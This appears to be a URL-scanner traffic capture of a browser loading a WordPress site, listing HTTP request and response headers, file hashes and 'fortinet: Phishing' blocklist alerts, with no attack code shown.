GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

34.102.187.140
HTTP/2 200 OK
content-type: application/json
access-control-allow-origin: *
access-control-expose-headers: Last-Modified, Retry-After, Cache-Control, Content-Type, Pragma, Backoff, ETag, Expires, Content-Length, Alert
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Sun, 04 Dec 2022 13:08:58 GMT
cache-control: public,max-age=3600
age: 2618
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
POST / HTTP/1.1
Host: ocsp.sectigo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sun, 04 Dec 2022 13:52:37 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Thu, 01 Dec 2022 05:26:22 GMT
Expires: Thu, 08 Dec 2022 05:26:21 GMT
Etag: "3098dbc7a62ab2193afb2a74abdcae610ed11358"
Cache-Control: max-age=314624,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb4
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 774506064f7bb4f7-OSL

                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 3639
Cache-Control: max-age=159293
Date: Sun, 04 Dec 2022 13:52:37 GMT
Etag: "638c632b-1d7"
Expires: Tue, 06 Dec 2022 10:07:30 GMT
Last-Modified: Sun, 04 Dec 2022 09:06:51 GMT
Server: ECS (ska/F71C)
X-Cache: HIT
Content-Length: 471

                                        
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: WX4btGd/MhSxM0MKjeT2zw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

54.186.169.128
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: lvKjrjT3jnwdc6iWem1t9m8qTTk=

                                        
GET /ajax/libs/slick-carousel/1.8.1/slick.min.css?ver=6.1.1 HTTP/1.1
Host: cdnjs.cloudflare.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

104.17.25.14
HTTP/2 200 OK
content-type: text/css; charset=utf-8
date: Sun, 04 Dec 2022 13:52:37 GMT
content-length: 394
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03fd5-559"
last-modified: Mon, 04 May 2020 16:16:21 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 15602385
expires: Fri, 24 Nov 2023 13:52:37 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mkRQRP7H15S9DtA1G3KvJbrZADVZ2qs94zc0pK29zsQ%2BVCWFgH4tmxORi%2FAgy8DygFDjkzLcrlsKpeAl60%2BScs7p%2BZBD%2Bubj1LFGWukZNdcMaf2JEj0W2aASF9W62XmM8vQBs7zE"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 7745060b0b460b45-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1327)
Size:   394
Md5:    50d05d35119a9bd8cf777402bb4789a0
Sha1:   fd03f42f191f21580b72dc3e474e9b7503a82555
Sha256: a8daf82dae80ef2b347046c449acf73de160cc273a70cb74ed4cb71597a69bfc
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sun, 04 Dec 2022 13:52:37 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET / HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

162.213.255.27
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.4.33
set-cookie: vchideactivationmsg_vc11=12.0; secure
link: <https://triumphinvestigativeservicesllc.com/wp-json/>; rel="https://api.w.org/", <https://triumphinvestigativeservicesllc.com/wp-json/wp/v2/pages/549>; rel="alternate"; type="application/json", <https://triumphinvestigativeservicesllc.com/>; rel=shortlink
content-encoding: br
vary: Accept-Encoding
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (9381), with CRLF, LF line terminators
Size:   33486
Md5:    c99d05210107c2a7d7dc810a7922a6b4
Sha1:   cc8f3073457b2c96df2b4a0c8404e068cc1ba91d
Sha256: fb43c18fbe37408729889cd865b82f636fa97a787cfc99f2ce4e6adb450d3991

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sun, 04 Dec 2022 13:52:37 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET /wp-includes/css/dashicons.min.css?ver=6.1.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Wed, 03 Mar 2021 21:16:22 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 35110
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (58981)
Size:   35110
Md5:    54c5bfb8a890d87139d9abfe01662c83
Sha1:   f9eddf5b8a3269e6d6fa40b4f13083705e6267c6
Sha256: 9685e5cabe4efc8c85e986725af8009b306416aad3ecc9086ca5bb12b84ce4ef

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/plugins/widget-areas/css/widget_areas.css?ver=1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:58:39 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 398
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   398
Md5:    3bb6f24d5cde232ea5bacb387c5d8497
Sha1:   bd3aa5ce595b703ecda7d9de00e384b4f6109bac
Sha256: e20822b8110464fea430b1ef6418376d006c70e5fea54e1cb9071fa41f31c78d

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/the-guard/css/alicoBold.css?ver=6.1.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:55:42 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 769
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   769
Md5:    26f917a5deccf1531b346579d31797bf
Sha1:   499f6fb6557272361624aedaa0bfb5e310ad8792
Sha256: 0eecdeec7d37c03115739205d244519682e921837f38def185245abdb7009d93

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/the-guard/css/security.css?ver=6.1.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:55:42 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 914
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   914
Md5:    dbd96baac7504fbb1b6a4a371d8732a5
Sha1:   ec734d0dc841648f5a44fa05316af532e831ea02
Sha256: edfa0fab19c5509790dde6c4da6c19c925aab2f81d58a071df1bf6a52999ee3d
                                        
GET /wp-content/themes/the-guard/css/dynamic.css?ver=6.1.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Mon, 10 Jan 2022 20:58:29 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 45122
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (573), with CRLF line terminators
Size:   45122
Md5:    85f5f25b2408a8d15da2eb58795c9e50
Sha1:   de7dfda6a38f98793d8a14e6754f35717973857a
Sha256: 48dbb40e79bb54b0b887151e99c6d4951c4a45e58af755eb9689233874dd89d7

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/the-guard/css/font-awesome.min.css?ver=6.1.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:55:42 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 5881
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (27303), with CRLF line terminators
Size:   5881
Md5:    3b79bb5d0d459d64902a51f4df5a0ab4
Sha1:   68dc515f97caa7971d7a0e5155a80e9ad3c3cb49
Sha256: af3dd89879ebc5fdd6c89730239f7e120958df1743cf030c2f11dcbc5779d238

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/the-guard/style.css?ver=6.1.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 27 Jan 2022 17:59:39 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 277
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   277
Md5:    01309bf1cf9303197bc9a0e9b30b0141
Sha1:   d3fce63a1924b2533fca7d0694562b7297ec9f4c
Sha256: 0945d9633719c3c3efdd917a564d718796b50d9548c4cf66c955219bb726989c

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Wed, 16 Nov 2022 06:53:52 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 11616
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (47826)
Size:   11616
Md5:    c4d7cc056b49b00e05cc29cc59aa3d5a
Sha1:   48c426bec60099d2a8628df430ed682c72aab42a
Sha256: 8009c12f2674a8d38401f4b5faad1fef2cfcd18a8c927ed2561ae9d7de9b57b5

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=5.9.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 10 Mar 2022 20:02:47 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1207
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (5305), with no line terminators
Size:   1207
Md5:    8869d434cd2a3350017c5dddb6b6c624
Sha1:   218f6b304da36e0e5c1212e2b8afd934f2801a93
Sha256: 80727ae14af6bf4636a9455f87ce0e83429bacb577965aee4d0ce980759bf7e9
                                        
GET /wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=5.9.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 10 Mar 2022 20:02:47 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 19387
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65527), with no line terminators
Size:   19387
Md5:    f1d5e220cfbd09e06b389c10979694e3
Sha1:   da093396b6e2edd29850a89d064fa1dbe81de37a
Sha256: 7c9fcb7425f600f500db87902ebccc00e0f4b2f918a801b3c39cb416628d64bf

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Fri, 04 Nov 2022 04:57:03 GMT
accept-ranges: bytes
content-length: 217
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   217
Md5:    95e891f28e44a9b314c09545d86be2b7
Sha1:   f9b13a8bd47273b086a0a07df15f314e0af0bc3e
Sha256: 5a5f39391fbf5b06db84b8f9716d53de575ee97a627d2c5f12f79a991a671eb5
                                        
GET /wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.4.5 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:21 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 41475
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65536), with no line terminators
Size:   41475
Md5:    9bd9929677372c465402cd09cde550fc
Sha1:   f133e6a51598db35af53c8f36cb78cea42bda800
Sha256: da693db958dd537bcb1d8002ac63f9e357b587c8218f2d849ab559938074d8e8

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:13:56 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 848
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   848
Md5:    c962ba8e7d42ff9da18392b41dad5151
Sha1:   7b89bc5e6ad161df2e6d7f7fb3ad894aa04b827f
Sha256: 322a4949c5bdd82eb80c13bbbd407ce30a7ad226685c54270d246cb6960e524e

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/plugins/responsive-lightbox/assets/swipebox/swipebox.min.css?ver=2.3.3 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:01:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 996
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (4224), with no line terminators
Size:   996
Md5:    2f786324d141c7293bdd07aed333968f
Sha1:   a803f868da0756bbf1d2c1d0655262df96a6b19c
Sha256: c8c307319b0b75a7c358307b354e3de33b53bde355e3b8f38ae1b04630a3a7e7
                                        
GET /wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.6.3.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:56:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 6856
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (29701), with CRLF line terminators
Size:   6856
Md5:    1adf583a268e30aaaed46550b156467c
Sha1:   6a785895330c86950708fe91b507a2e7803eb8be
Sha256: 25dde0693ac14abf231374b31feb6f7a8e4e7687640d1c013e3336ad03d1283f
                                        
GET /wp-content/uploads/smile_fonts/Defaults/Defaults.css?ver=6.1.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: text/css
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:58:05 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
